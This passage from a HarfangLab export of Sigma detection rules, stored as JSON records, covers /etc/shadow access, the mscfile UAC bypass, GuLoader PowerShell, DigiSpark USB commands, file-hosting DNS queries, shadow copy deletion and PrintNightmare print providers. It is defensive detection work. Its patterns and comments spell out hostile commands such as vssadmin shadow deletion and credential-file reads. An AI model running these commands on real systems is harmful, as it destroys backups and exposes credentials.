-coredump'\n ProcessGrandparentCommandLine: './osconfexec -coredump'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70a2410f-7713-47f6-aebd-e7a300dd5add",
"rule_name": "File /etc/shadow Accessed via Command-line",
"rule_description": "Detects a suspicious attempt to access /etc/shadow from the command-line using common file viewing or copying utilities.\nThis file contains the hashed passwords of all local accounts on the system.\nThe content of this file is often used to gather information about the system and for offline password cracking.\nIt is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\nIf this activity comes from legitimate software in your environment and is recurrent, it is highly recommended to whitelist the offending processes.\n",
"rule_creation_date": "2021-09-14",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70a8e0db-44d1-44c4-b3f2-c0f6491afcfa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092927Z",
"creation_date": "2026-03-23T11:45:34.092929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092933Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_mscfile.yml",
"content": "title: Mscfile UAC Bypass Prepared\nid: 70a8e0db-44d1-44c4-b3f2-c0f6491afcfa\ndescription: |\n Detects the preparation of the mscfile UAC bypass, in which the per-user (HKU) mscfile shell command handler is set, symlinked or renamed via the registry.\n Adversaries may bypass UAC mechanisms to elevate process privileges on a system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\mscfile\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\mscfile\\\\*SymbolicLinkValue'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\mscfile\\\\*'\n\n condition: (selection_set_value and not filter_empty) or selection_rename\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70a8e0db-44d1-44c4-b3f2-c0f6491afcfa",
"rule_name": "Mscfile UAC Bypass Prepared",
"rule_description": "Detects the preparation of the mscfile UAC bypass, in which the per-user (HKU) mscfile shell command handler is set, symlinked or renamed via the registry.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-25",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70ca224f-c417-4d4e-8b9e-bb8645c6218e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611409Z",
"creation_date": "2026-03-23T11:45:34.611412Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611420Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.partitionwizard.com/partitionmanager/what-is-premieropinion-on-my-computer.html",
"https://attack.mitre.org/techniques/T1119/"
],
"name": "t1119_premier_opinion_adware.yml",
"content": "title: Premier Opinion AdWare RunDLL32 Execution\nid: 70ca224f-c417-4d4e-8b9e-bb8645c6218e\ndescription: |\n Detects the execution of Premier Opinion's DLL through RunDLL32.\n Premier Opinion is an adware that collects and sells internet usage data.\n It is recommended to remove this DLL file and investigate the calling process for traces of persistence.\nreferences:\n - https://www.partitionwizard.com/partitionmanager/what-is-premieropinion-on-my-computer.html\n - https://attack.mitre.org/techniques/T1119/\ndate: 2023/06/15\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1119\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Adware.PremierOpinion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: ' pmls64.dll,RunProcWithDll '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70ca224f-c417-4d4e-8b9e-bb8645c6218e",
"rule_name": "Premier Opinion AdWare RunDLL32 Execution",
"rule_description": "Detects the execution of Premier Opinion's DLL through RunDLL32.\nPremier Opinion is an adware that collects and sells internet usage data.\nIt is recommended to remove this DLL file and investigate the calling process for traces of persistence.\n",
"rule_creation_date": "2023-06-15",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "70f273a7-a783-4f80-b090-c40092c56e80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091843Z",
"creation_date": "2026-03-23T11:45:34.091845Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091849Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/",
"https://github.com/zer0overflow/DigiPwn",
"https://attack.mitre.org/techniques/T1091/",
"https://attack.mitre.org/techniques/T1200/"
],
"name": "t1200_popular_digispark_commands.yml",
"content": "title: DigiSpark USB Malicious Commands\nid: 70f273a7-a783-4f80-b090-c40092c56e80\ndescription: |\n Detects popular default commands and processes used by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\n This detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\n It is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\nreferences:\n - https://redacted.au/creating-a-usb-rubber-ducky-from-a-digispark-attiny-85/\n - https://github.com/zer0overflow/DigiPwn\n - https://attack.mitre.org/techniques/T1091/\n - https://attack.mitre.org/techniques/T1200/\ndate: 2025/01/06\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1200\n - attack.t1091\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.DigiSpark\n - classification.Windows.Behavior.USB\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|contains:\n - 'start C:/Windows/System32/Ribbons.scr /s'\n - 'copy con tmp.cmd'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "70f273a7-a783-4f80-b090-c40092c56e80",
"rule_name": "DigiSpark USB Malicious Commands",
"rule_description": "Detects popular default commands and processes used by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\nThis detects snippets from different public repositories associated with DigiSpark. While some actions may not be from a DigiSpark device, they may still be malicious.\nIt is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged in to this machine.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71194d01-ab1d-4958-a874-28f60815affe",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604355Z",
"creation_date": "2026-03-23T11:45:34.604358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/",
"https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf",
"https://attack.mitre.org/software/S0561/"
],
"name": "t1059_001_guloader_powershell.yml",
"content": "title: PowerShell Command-line Related to GuLoader\nid: 71194d01-ab1d-4958-a874-28f60815affe\ndescription: |\n Detects suspicious PowerShell command-line arguments used by the VBS variants of GuLoader.\n GuLoader is an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\n This particular rule is geared towards the early infection chain, detecting when a user runs GuLoader's malicious VBS script used for an initial foothold.\n It is recommended to investigate the PowerShell script to determine its legitimacy and see if it matches the GuLoader pattern.\nreferences:\n - https://research.checkpoint.com/2023/cloud-based-malware-delivery-the-evolution-of-guloader/\n - https://www.intrinsec.com/wp-content/uploads/2023/09/TLP-CLEAR-20230912-EN-GuLoader-Information-report.pdf\n - https://attack.mitre.org/software/S0561/\ndate: 2023/12/15\nmodified: 2025/03/12\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1204.002\n - attack.s0561\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Loader.GuLoader\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\Wscript.exe'\n Image|endswith: '\\Powershell.exe'\n # Function heftestra9 ([String]$Mordr13 )\n # Function Lomtama ([String]$Hellig)\n # Function undervisni9 ( [String]$Plynlymm )\n CommandLine|re: 'powershell\\.exe Function \\w{3,12} *?\\( *?\\[String\\] *?\\$\\w{3,12} *?\\)'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71194d01-ab1d-4958-a874-28f60815affe",
"rule_name": "PowerShell Command-line Related to GuLoader",
"rule_description": "Detects suspicious PowerShell command-line arguments used by the VBS variants of GuLoader.\nGuLoader is an advanced malware downloader that uses a polymorphic shellcode loader to dodge traditional security solutions.\nThis particular rule is geared towards the early infection chain, detecting when a user runs GuLoader's malicious VBS script used for an initial foothold.\nIt is recommended to investigate the PowerShell script to determine its legitimacy and see if it matches the GuLoader pattern.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "71223ef6-7b62-4e8e-8457-634d94aea022",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625291Z",
"creation_date": "2026-03-23T11:45:34.625293Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625297Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
"https://twitter.com/embee_research/status/1623908375242350593",
"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1105_suspicious_dns_request_filehosting.yml",
"content": "title: DNS Request to Suspicious File Hosting Website (Windows)\nid: 71223ef6-7b62-4e8e-8457-634d94aea022\ndescription: |\n Detects a DNS request to a public file hosting service that may contain a malicious payload.\n This technique has been used by ransomware operators to download payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/\n - https://twitter.com/embee_research/status/1623908375242350593\n - https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/11/20\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: dns_query\n product: windows\ndetection:\n selection:\n QueryName:\n - '*transfer.sh'\n - '*gofile.io'\n - '*file.io'\n - '*send.exploit.in'\n - '*catbox.moe'\n - 'temp.sh'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_legitimate:\n QueryName: 'featureflags.sharefile.io'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - 
'?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_xmind:\n ProcessImage:\n - '?:\\Program Files\\XMind\\XMind.exe'\n - '?:\\Program Files (x86)\\XMind\\XMind.exe'\n\n exclusion_rave:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\rave-desktop\\rave.exe'\n\n exclusion_opera:\n ProcessImage|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n exclusion_cisco:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\CiscoSparkLauncher\\CiscoCollabHost.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "71223ef6-7b62-4e8e-8457-634d94aea022",
"rule_name": "DNS Request to Suspicious File Hosting Website (Windows)",
"rule_description": "Detects a DNS request, issued by a non-browser process, to a public file hosting service that may be hosting a malicious payload.\nThis technique has been used by ransomware operators to download payloads that are hosted on public websites.\nNote that a DNS query only shows that the domain was resolved, not that a file was actually downloaded; queries issued by web browsers and by signed binaries located under Program Files are excluded.\nIt is recommended to identify the process that issued the query and, if a file was downloaded, to analyze it to check whether its content is malicious.\n",
"rule_creation_date": "2023-11-20",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "712a3c26-8c9a-4390-938e-dd0dd4e5595c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071720Z",
"creation_date": "2026-03-23T11:45:34.071722Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071726Z",
"rule_level": "critical",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_shadow_copy_deleted.yml",
"content": "title: Volume Shadow Copies Deleted\nid: 712a3c26-8c9a-4390-938e-dd0dd4e5595c\ndescription: |\n Detects when a Volume Shadow Copies (VSS) is deleted (or resized to a very low value) using various systems utilities such as vssadmin and wmic.\n Numerous threat actors and ransomwares perform this operation prior to deleting/encrypting data.\n It is recommended to check if this operation is expected and to analyze the process' parent for other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/09/28\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith:\n - '\\wmic.exe'\n - '\\vssadmin.exe'\n # renamed binaries\n - OriginalFileName:\n - 'wmic.exe'\n - 'VSSADMIN.EXE'\n\n selection_delete:\n CommandLine|contains|all:\n # we want to match :\n # - vssadmin delete shadows (/all /quiet)\n # - wmic shdowcopy delete\n # matching shadow ==> matches on shadows and shadowcopy\n - delete\n - shadow\n selection_resize_shadowstorage:\n CommandLine|contains|all:\n # handles vssadmin resize shadowstorage /for=xx /maxsize=yy with yy == low value (which deletes whadow copies..)\n # see https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin-resize-shadowstorage\n - 'resize'\n - 'shadowstorage'\n - '/maxsize'\n selection_delete_shadowstorage:\n CommandLine|contains|all:\n - 'delete'\n - 'shadowstorage'\n\n exclusion_litetouch:\n # vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=5%\n CommandLine: 'vssadmin resize shadowstorage /For=C: /On=C: /MaxSize=5%'\n # C:\\Windows\\System32\\wscript.exe C:\\MININT\\Scripts\\LTICleanup.wsf\n # 
C:\\Windows\\System32\\wscript.exe \\\\1[redacted]\\e$\\DeploymentShare\\Scripts\\LTICleanup.wsf\n # cscript.exe \\\\[redacted]\\DeploymentShare$\\Scripts\\LTICleanup.wsf\n GrandparentImage:\n - '?:\\Windows\\System32\\wscript.exe'\n - '?:\\Windows\\System32\\cscript.exe'\n GrandparentCommandLine|contains: '\\Scripts\\LTICleanup.wsf'\n\n exclusion_iperius:\n CommandLine:\n - 'vssadmin delete shadows /For=C: /Oldest /Quiet'\n - 'vssadmin delete shadows /shadow={????????-????-????-????-????????????} /quiet'\n GrandparentImage:\n - '?:\\Program Files (x86)\\Iperius Backup\\Iperius.exe'\n - '?:\\Program Files (x86)\\Sauvegarde System\\Iperius.exe'\n\n exclusion_big_size:\n # C:\\WINDOWS\\system32\\vssadmin.exe resize shadowstorage /on=c: /for=c: /maxsize=10240MB\n CommandLine:\n - '* resize */maxsize=1????MB*'\n - '* resize */maxsize=2????MB*'\n - '* resize */maxsize=3????MB*'\n - '* resize */maxsize=4????MB*'\n - '* resize */maxsize=5????MB*'\n - '* resize */Maxsize=1?GB*'\n - '* resize */Maxsize=2?GB*'\n - '* resize */Maxsize=3?GB*'\n - '* resize */Maxsize=4?GB*'\n - '* resize */Maxsize=5?GB*'\n - '* resize */MaxSize=1?%'\n - '* resize */MaxSize=2?%'\n - '* resize */MaxSize=3?%'\n - '* resize */MaxSize=4?%'\n - '* resize */MaxSize=5?%'\n\n exclusion_dell:\n ProcessParentOriginalFileName: 'VssShadowFix.exe'\n ProcessParentSignature: 'Dell Inc'\n CommandLine: '?:\\WINDOWS\\system32\\vssadmin.exe resize shadowstorage /for=?: /on=?: /maxsize=2%'\n\n exclusion_easyus:\n ParentImage: '?:\\Program Files\\EaseUS\\EaseUS Partition Master\\bin\\EPMUI.exe'\n\n exclusion_kiwibackup:\n ParentImage: '?:\\Program Files\\Kiwi-Backup\\Kiwi-Backup\\kiwi.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'KIWI BACKUP'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: critical\n# level: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "712a3c26-8c9a-4390-938e-dd0dd4e5595c",
"rule_name": "Volume Shadow Copies Deleted",
"rule_description": "Detects when Volume Shadow Copies (VSS) are deleted (or when the shadow storage is resized to a very low value, which has the same effect) using the vssadmin or wmic system utilities, including renamed copies of these binaries.\nNumerous threat actors and ransomware families perform this operation prior to deleting/encrypting data, in order to prevent recovery.\nNote that this rule only covers vssadmin and wmic; shadow copies deleted through other means are not detected by it.\nIt is recommended to check if this operation is expected (e.g. performed by a backup or deployment tool) and to analyze the process' parent for other suspicious activities.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7135edeb-86d3-4d04-a2e4-8eb48e25987c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608498Z",
"creation_date": "2026-03-23T11:45:34.608501Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608508Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675",
"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999",
"https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
"https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81"
],
"name": "t1574_spoolsv_new_malicious_provider.yml",
"content": "title: Malicious Print Provider Added\nid: 7135edeb-86d3-4d04-a2e4-8eb48e25987c\ndescription: |\n Detects the installation of a malicious print provider via a registry value.\n This can be the result of an exploitation of CVE-2021-1675 (aka PrintNightmare) or CVE-2022-21999 (aka SpoolFool) to gain code execution in spoolsv.\n This is a remote or local code execution vulnerability that exists in the Windows Print Spooler service.\n An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges.\n It is recommended to investigate the timeline for malicious activity and to look for any suspicious processes or alerts running as SYSTEM.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21999\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675\n - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999\n - https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/\n - https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81\ndate: 2021/11/12\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1574\n - attack.s0002\n - cve.2021-1675\n - cve.2022-21999\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.CVE-2022-21999\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.SpoolFool\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_base:\n EventType: SetValue\n Image|endswith: '\\spoolsv.exe'\n selection_variant_cve_2021_1675:\n TargetObject:\n - 